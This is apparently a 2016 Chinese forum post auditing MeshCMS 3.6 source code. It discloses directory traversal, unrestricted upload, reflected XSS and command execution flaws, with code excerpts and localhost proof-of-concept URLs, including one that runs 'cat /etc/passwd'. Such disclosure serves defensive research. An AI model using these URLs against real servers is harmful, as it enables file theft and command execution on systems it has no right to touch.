[原创]开源J2EE CMS源码审计之MeshCMS实践
发表于:
2016-6-8 18:11
2512
[原创]开源J2EE CMS源码审计之MeshCMS实践
开源J2EE CMS源码审计之MeshCMS学习实践
#############
受影响版本: MeshCMS 3.6 – Multiple vulnerabilities
Date: 2016-04-03
软件开发厂商: http://www.cromoteca.com/en/meshcms/
软件下载链接: http://www.cromoteca.com/en/meshcms/download/
版本: 3.6
测试平台: Windows OS
#############
开源MeshCMS介绍:
MeshCMS is an online editing system written in Java. It provides a set of features usually included in a CMS, but it uses a more traditional approach: pages are stored in regular HTML files and all additional features are file-based, without needing a database.
#############
Vulnerability Description:
1、Directory traversal Vulnerability(目录穿越漏洞)
该软件下载功能是通过名为DownloadServlet的servlet提供,下载过程中未限制文件扩展名,导致可下载源码文件。
String str = paramHttpServletRequest.getParameter("filename");
if (Utils.isNullOrEmpty(str)) {
str = localPath.getLastElement();
}
try
{
FileInputStream localFileInputStream = new FileInputStream((File)localObject);
paramHttpServletResponse.setContentType("application/x-download");
paramHttpServletResponse.setHeader("Content-Disposition", "attachment; filename=\"" + str + "\"");
paramHttpServletResponse.setHeader("Content-Length", Long.toString(((File)localObject).length()));
Utils.copyStream(localFileInputStream, paramHttpServletResponse.getOutputStream(), false);
}
POC:
http://127.0.0.1:8080/meshcms/servlet/org.meshcms.core.DownloadServlet/meshcms/admin/filemanager/upload1.jsp
http://127.0.0.1:8080/meshcms/servlet/org.meshcms.core.DownloadServlet/meshcms/admin/login.jsp
2、File Upload Vulnerability
the upload2.jsp don’t check the upload file’security(上传基本就瞎了,没任何过滤).
try {
FileItem upItem = null;
ServletFileUpload upload = new ServletFileUpload(new DiskFileItemFactory());
upload.setProgressListener(new UploadProgressListener(request.getSession(true)));
List items = upload.parseRequest(request);
Iterator iter = items.iterator();
while (iter.hasNext()) {
FileItem item = (FileItem) iter.next();
if (item.getFieldName().equals("dir")) {
path = new Path(item.getString());
} else if (item.getFieldName().equals("fixname")) {
fixName = Utils.isTrue(item.getString());
} else if (item.getFieldName().equals("upfile") && item.getSize() > 0L) {
upItem = item;
}
}
if (upItem != null && path != null) {
String fileName = new Path(upItem.getName()).getLastElement();
if (fixName) {
fileName = Utils.generateUniqueName
(WebUtils.fixFileName(fileName, true), webSite.getFile(path));
}
ok = webSite.saveToFile(userInfo, upItem, path.add(fileName));
}
3、反射型XSS
meshcms/meshcms/admin/目录下有个echo.jsp文件,fullsrc未做任何过滤。
try {
response.resetBuffer();
} catch (IllegalStateException ex) {
//
}
response.getWriter().write(request.getParameter("fullsrc"));
%>
POC:
http://127.0.0.1:8080/meshcms/meshcms/admin/echo.jsp?fullsrc=%3Cscript%3Ealert%281%29%3C/script%3E
4、Command Execution Vulnerability
进行文件备份过程中staticexport2.jsp可根据客户端传入参数执行系统命令,exportCommand没有做任何过滤,导致命令执行漏洞。
if (!exportCommand.equals("")) {
out.println("\nexecuting: " + exportCommand);
Process process = Runtime.getRuntime().exec(exportCommand);
out.println("standard output:");
ByteArrayOutputStream baos = new ByteArrayOutputStream();
Utils.copyStream(process.getInputStream(), baos, false);
out.write(Utils.encodeHTML(baos.toString()));
baos.reset();
out.println("end of standard output\nerror output:");
Utils.copyStream(process.getErrorStream(), baos, false);
out.write(Utils.encodeHTML(baos.toString()));
int exit = process.waitFor();
out.println("end of error output\nexecution finished with exit code " + exit);
POC:
http://127.0.0.1:8080/meshcms/meshcms/admin/staticexport2.jsp?exportBaseURL=%2Fmeshcms%2Fadmin%2Fstaticexport1.jsp&exportDir=upload&exportCheckDates=true&exportCommand=cat+%2Fetc%2Fpasswd&exportSaveConfig=true
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
上传的附件: